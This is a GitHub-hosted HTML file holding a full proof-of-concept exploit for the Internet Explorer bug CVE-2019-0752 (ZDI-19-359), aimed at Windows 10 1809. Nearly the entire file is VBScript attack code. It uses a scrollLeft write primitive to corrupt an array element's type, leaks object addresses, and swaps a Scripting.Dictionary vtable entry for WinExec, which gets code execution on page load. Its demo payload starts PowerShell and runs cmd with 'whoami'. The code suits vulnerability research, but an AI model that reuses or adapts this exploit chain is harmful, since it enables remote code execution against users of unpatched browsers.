Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
PoC/ZDI-19-359/exploit.html
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
138 lines (117 sloc)
4.18 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 --> | |
| <!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) --> | |
| <!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 --> | |
| <!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get --> | |
| <!-- all the way to RCE using no shellcode. --> | |
| <!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. --> | |
| <!-- (h/t: James Forshaw, Google Project Zero) --> | |
| <html> | |
| <meta http-equiv="x-ua-compatible" content="IE=8"> | |
| <meta http-equiv="Expires" content="-1"> | |
| <body> | |
| <div id="container1" style="overflow:scroll; width: 10px"> | |
| <div id="content1" style="width:5000000px"> | |
| Content | |
| </div> | |
| </div> | |
| <script language="VBScript.Encode"> | |
| Dim ar1(&h3000000) | |
| Dim ar2(1000) | |
| Dim gremlin | |
| addressOfGremlin = &h28281000 | |
| Class MyClass | |
| Private mValue | |
| Public Property Let Value(v) | |
| mValue = v | |
| End Property | |
| Public Default Property Get P | |
| P = mValue ' Where to write | |
| End Property | |
| End Class | |
| Sub TriggerWrite(where, val) | |
| Dim v1 | |
| Set v1 = document.getElementById("container1") | |
| v1.scrollLeft = val ' Write this value (Maximum: 0x001767dd) | |
| Dim c | |
| Set c = new MyClass | |
| c.Value = where | |
| Set v1.scrollLeft = c | |
| End Sub | |
| ' Our vulnerability does not immediately give us an unrestricted | |
| ' write (though we could manufacture one). For our purposes, the | |
| ' following is sufficient. It writes an arbitrary DWORD to an | |
| ' arbitrary location, and sets the subsequent 3 bytes to zero. | |
| Sub WriteInt32With3ByteZeroTrailer(addr, val) | |
| TriggerWrite addr , (val) AND &hff | |
| TriggerWrite addr + 1, (val\&h100) AND &hff | |
| TriggerWrite addr + 2, (val\&h10000) AND &hff | |
| TriggerWrite addr + 3, (val\&h1000000) AND &hff | |
| End Sub | |
| Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str) | |
| For i = 0 To Len(str) - 1 | |
| TriggerWrite addr + i, Asc(Mid(str, i + 1, 1)) | |
| Next | |
| End Sub | |
| Function ReadInt32(addr) | |
| WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr | |
| ReadInt32 = ar1(gremlin) | |
| End Function | |
| Function LeakAddressOfObject(obj) | |
| Set ar1(gremlin + 1) = obj | |
| LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18) | |
| End Function | |
| Sub Exploit() | |
| ' Corrupt vt of one array element (the "gremlin") | |
| TriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4 | |
| For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100 | |
| If Not IsEmpty(ar1(i)) Then | |
| gremlin = i | |
| Exit For | |
| End If | |
| Next | |
| If IsEmpty(gremlin) Then | |
| MsgBox "Could not find gremlin" | |
| Exit Sub | |
| End If | |
| For i = 0 To UBound(ar2) | |
| Set ar2(i) = CreateObject("Scripting.Dictionary") | |
| Next | |
| Set dict = ar2(UBound(ar2) / 2) | |
| addressOfDict = LeakAddressOfObject(dict) | |
| vtableOfDict = ReadInt32(addressOfDict) | |
| scrrun = vtableOfDict - &h11fc | |
| kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90 | |
| winExec = kernel32 + &h5d380 | |
| dict.Exists "dummy" ' Make a dispatch call, just to populate pld | |
| ' Relocate pld to ensure its address doesn't contain a null byte | |
| pld = ReadInt32(addressOfDict + &h3c) | |
| fakePld = &h28281020 | |
| For i = 0 To 3 - 1 | |
| WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i) | |
| Next | |
| fakeVtable = &h28282828 ' ASCII "((((" | |
| For i = 0 To 21 | |
| If i = 12 Then ' Dictionary.Exists | |
| fptr = winExec | |
| Else | |
| fptr = ReadInt32(vtableOfDict + 4 * i) | |
| End If | |
| WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr | |
| Next | |
| WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA" | |
| WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld | |
| WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))""" | |
| On Error Resume Next | |
| dict.Exists "dummy" ' Wheeee!! | |
| ' A little cleanup to help prevent crashes after the exploit | |
| For i = 1 To 3 | |
| WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict | |
| WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2 | |
| Next | |
| Erase Dict | |
| Erase ar2 | |
| End Sub | |
| Exploit | |
| </script> | |
| </body> | |
| </html> |